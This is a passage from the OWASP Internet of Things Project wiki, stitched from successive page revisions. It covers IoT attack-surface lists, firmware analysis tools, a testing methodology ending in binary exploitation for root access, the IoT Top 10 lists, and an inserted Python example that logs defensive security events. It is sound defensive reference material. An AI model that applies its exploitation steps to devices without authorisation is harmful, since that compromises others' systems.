* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and information security professionals to conduct firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relevant technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Obtain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit vulnerabilities identified in previous stages to obtain root and/or code execution<br />
|}<br />
The full methodology release can be downloaded via the following link (TBD).<br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
*Attack walkthroughs<br />
*Tool usage examples<br />
*Screenshots<br />
*Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki> <br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* TBD<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
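As an added example (not code from the OWASP project), the following Python shows one way a device could emit several of the events in the table above as structured JSON log lines, derived from its own request records. The record layout, the thresholds, the per-user home-country baseline, and the assumption that the authentication subsystem flags factory-default credentials are all assumptions made for this example; the sample records are constructed, not real device logs.

```python
import json
from collections import defaultdict, deque

# Thresholds are assumptions for this example, not values from the OWASP list.
ALLOWED_METHODS = {"GET", "POST", "PUT", "DELETE"}
FAILED_PASSWORD_THRESHOLD = 3   # failures per user before "Multiple Failed Passwords"
RATE_WINDOW_SECONDS = 10        # sliding window for "High Rate of Login Attempts"
RATE_THRESHOLD = 5              # login attempts per source address within the window


class IoTEventLogger:
    """Turns raw device request records into the categorised security events
    recommended in the IoT Logging Events table, as JSON lines a collector can
    forward to a SIEM. Category and event names match the table."""

    def __init__(self, home_country_by_user):
        self.home_country_by_user = home_country_by_user  # assumed geo baseline per user
        self.failed_by_user = defaultdict(int)
        self.attempts_by_src = defaultdict(deque)
        self.session_src = {}  # session_id -> first source address seen
        self.events = []

    def _emit(self, category, event, record, **detail):
        self.events.append({
            "ts": record["ts"], "category": category, "event": event,
            "src_ip": record["src_ip"], "user": record.get("user"), **detail})

    def process(self, record):
        # Request Exceptions: HTTP method the device does not implement
        if record["method"] not in ALLOWED_METHODS:
            self._emit("Request Exceptions",
                       "Attempt to Invoke Unsupported HTTP Method", record,
                       method=record["method"])
        # Session Exceptions: an existing session id arrives from a new source
        sid = record.get("session_id")
        if sid:
            first_src = self.session_src.setdefault(sid, record["src_ip"])
            if first_src != record["src_ip"]:
                self._emit("Session Exceptions",
                           "Source Location Changes During Session", record,
                           session_id=sid, original_src=first_src)
        if record.get("login_attempt"):
            self._process_login(record)

    def _process_login(self, record):
        user = record["user"]
        # High Rate of Login Attempts: sliding window per source address
        window = self.attempts_by_src[record["src_ip"]]
        window.append(record["ts"])
        while window and record["ts"] - window[0] > RATE_WINDOW_SECONDS:
            window.popleft()
        if len(window) == RATE_THRESHOLD:  # emit when the threshold is reached
            self._emit("Authentication Exceptions", "High Rate of Login Attempts",
                       record, attempts_in_window=len(window))
        if not record["auth_ok"]:
            self.failed_by_user[user] += 1
            if self.failed_by_user[user] == FAILED_PASSWORD_THRESHOLD:
                self._emit("Authentication Exceptions", "Multiple Failed Passwords",
                           record, failures=self.failed_by_user[user])
            return
        self.failed_by_user[user] = 0  # a successful login resets the counter
        home = self.home_country_by_user.get(user)
        if home and record["country"] != home:
            self._emit("Authentication Exceptions",
                       "Deviation from Normal GEO Location", record,
                       expected=home, observed=record["country"])
        # Assumption: the auth subsystem marks logins made with factory defaults.
        if record.get("used_default_credentials"):
            self._emit("Administrative Mode Events",
                       "Device Accessed Using Default Administrative Credentials",
                       record)

    def as_json_lines(self):
        return "\n".join(json.dumps(e, sort_keys=True) for e in self.events)


# Constructed sample records (not real device logs); ts is seconds since boot.
SAMPLE_RECORDS = [
    {"ts": 0, "src_ip": "10.0.0.5", "user": "admin", "method": "POST", "country": "DE",
     "login_attempt": True, "auth_ok": False},
    {"ts": 1, "src_ip": "10.0.0.5", "user": "admin", "method": "POST", "country": "DE",
     "login_attempt": True, "auth_ok": False},
    {"ts": 2, "src_ip": "10.0.0.5", "user": "admin", "method": "POST", "country": "DE",
     "login_attempt": True, "auth_ok": False},
    {"ts": 3, "src_ip": "10.0.0.5", "user": "admin", "method": "POST", "country": "DE",
     "login_attempt": True, "auth_ok": False},
    {"ts": 4, "src_ip": "10.0.0.5", "user": "admin", "method": "POST", "country": "DE",
     "login_attempt": True, "auth_ok": True, "used_default_credentials": True},
    {"ts": 5, "src_ip": "10.0.0.5", "user": "admin", "method": "TRACE",
     "session_id": "s1"},
    {"ts": 6, "src_ip": "203.0.113.9", "user": "admin", "method": "GET",
     "session_id": "s1"},
    {"ts": 7, "src_ip": "203.0.113.9", "user": "admin", "method": "POST", "country": "BR",
     "login_attempt": True, "auth_ok": True},
]


def run_sample():
    """Feed the constructed records through the logger and return the events."""
    logger = IoTEventLogger(home_country_by_user={"admin": "DE"})
    for rec in SAMPLE_RECORDS:
        logger.process(rec)
    return logger.events


if __name__ == "__main__":
    logger = IoTEventLogger(home_country_by_user={"admin": "DE"})
    for rec in SAMPLE_RECORDS:
        logger.process(rec)
    print(logger.as_json_lines())
```

Each event carries the table's category and event name verbatim, so a downstream rule set can key on those strings rather than on free-text messages; the sample run produces six events covering the request, session, authentication and administrative-mode categories.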
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program around IoT devices, and companies that want to log more have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman
https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255832
OWASP Internet of Things Project
2019-10-31T14:49:56Z
<p>Aaron.guzman: FSTM</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides, Tools, and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help developers, manufacturers, enterprises, and consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical use of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Not every mapping is a one-to-one relation; where there is no exact match, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
